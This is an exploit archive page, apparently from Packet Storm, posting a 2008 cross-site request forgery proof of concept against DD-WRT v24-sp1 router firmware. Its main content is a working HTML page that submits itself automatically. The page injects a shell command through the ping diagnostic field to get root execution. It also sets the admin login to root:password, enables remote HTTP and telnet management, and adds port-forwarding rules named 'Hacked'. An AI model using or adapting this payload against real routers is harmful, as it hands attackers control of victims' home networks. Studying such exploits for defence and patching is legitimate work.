DD-WRT 24-sp1 Cross Site Request Forgery

DD-WRT 24-sp1 Cross Site Request Forgery: Posted Dec 8, 2008; Authored by Michael Brooks | Site rooksecurity.com; DD-WRT version 24-sp1 cross site request forgery exploit that lets you execute code as root.; tags | exploit, root, csrf; SHA-256 | ea1750995b85d3fb72b396b9c3ebcc78250d8ea8531d28a92405edb81be28e87; Download | Favorite | View

DD-WRT 24-sp1 Cross Site Request Forgery

Remote root dd-wrt
--------------------------------------------------------------------------------

Written by Michael Brooks
Special thanks to str0ke

Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/

Impact:
1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT.

<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
  </head>
  Remote root command execution /bin/sh
  <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
    <input name="submit_button" value="Ping" type="hidden">
    <input name="action" value="ApplyTake" type="hidden">
    <input name="submit_type" value="start" type="hidden">
    <input name="change_action" value="gozila_cgi" type="hidden">
    <input name="next_page" value="Diagnostics.asp" type="hidden">
    <input name="ping_ip" value="echo owned">
    <input name="execute command" type="submit">
  </form><br><br>  
  enable remote administration and change login to root:password
  <form method="post" action="http://192.168.1.1/apply.cgi">
    <input name="submit_button" value="Management" type="hidden">
    <input name="action" value="ApplyTake" type="hidden">
    <input name="change_action" value="" type="hidden">
    <input name="submit_type" value="" type="hidden">
    <input name="commit" value="1" type="hidden">
    <input name="PasswdModify" value="0" type="hidden">
    <input name="remote_mgt_https" value="" type="hidden">
    <input name="http_enable" value="1" type="hidden">
    <input name="info_passwd" value="0" type="hidden">
    <input name="https_enable" value="" type="hidden">
    <input name="http_username" value="root" type="hidden">
    <input name="http_passwd" value="password" type="hidden">
    <input name="http_passwdConfirm" value="password" type="hidden">
    <input name="_http_enable" value="1" type="hidden">
    <input name="refresh_time" value="3" type="hidden">
    <input name="status_auth" value="1" type="hidden">
    <input name="maskmac" value="1" type="hidden">
    <input name="remote_management" value="1" type="hidden">
    <input name="http_wanport" value="8080" type="hidden">
    <input name="remote_mgt_telnet" value="1" type="hidden">
    <input name="telnet_wanport" value="23" type="hidden">
    <input name="boot_wait" value="on" type="hidden">
    <input name="cron_enable" value="1" type="hidden">
    <input name="cron_jobs" value="" type="hidden">
    <input name="loopback_enable" value="1" type="hidden">
    <input name="nas_enable" value="1" type="hidden">
    <input name="resetbutton_enable" value="1" type="hidden">
    <input name="zebra_enable" value="1" type="hidden">
    <input name="ip_conntrack_max" value="512" type="hidden">
    <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
    <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
    <input name="overclocking" value="200" type="hidden">
    <input name="router_style" value="yellow" type="hidden">
    <input name="Remote Admin" type="submit">
  </form><br><br>
  Change Port Forwarding to byass NAT protection.
  <form method="post" action="http://192.168.1.1/apply.cgi">  
    <input name="submit_button" value="Change Port Forwarding" type="submit">
    <input name="action" value="ApplyTake" type="hidden">
    <input name="change_action" value="" type="hidden">
    <input name="submit_type" value="" type="hidden">
    <input name="forward_spec" value="13" type="hidden">
    <input name="name0" value="Hacked" type="hidden">
    <input name="from0" value="4450" type="hidden">
    <input name="pro0" value="both" type="hidden">
    <input name="ip0" value="192.168.1.100" type="hidden">
    <input name="to0" value="445" type="hidden">
    <input name="enable0" value="on" type="hidden">
    <input name="name1" value="Hacked Again" type="hidden">
    <input name="from1" value="22" type="hidden">
    <input name="pro1" value="tcp" type="hidden">
    <input name="ip1" value="192.168.1.101" type="hidden">
    <input name="to1" value="22" type="hidden">
    <input name="enable1" value="on" type="hidden">
  </form>
</html>
<script>
  document.getElementById(1).submit();//remote root command execution!
</script>

Top Authors In Last 30 Days

Red Hat 282 files
Jay Turla 150 files
indoushka 149 files
Ubuntu 69 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 31 files
H D Moore 31 files
Debian 30 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,059)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,725)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,806)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

DD-WRT 24-sp1 Cross Site Request Forgery

DD-WRT 24-sp1 Cross Site Request Forgery

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DD-WRT 24-sp1 Cross Site Request Forgery

Share This

DD-WRT 24-sp1 Cross Site Request Forgery

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems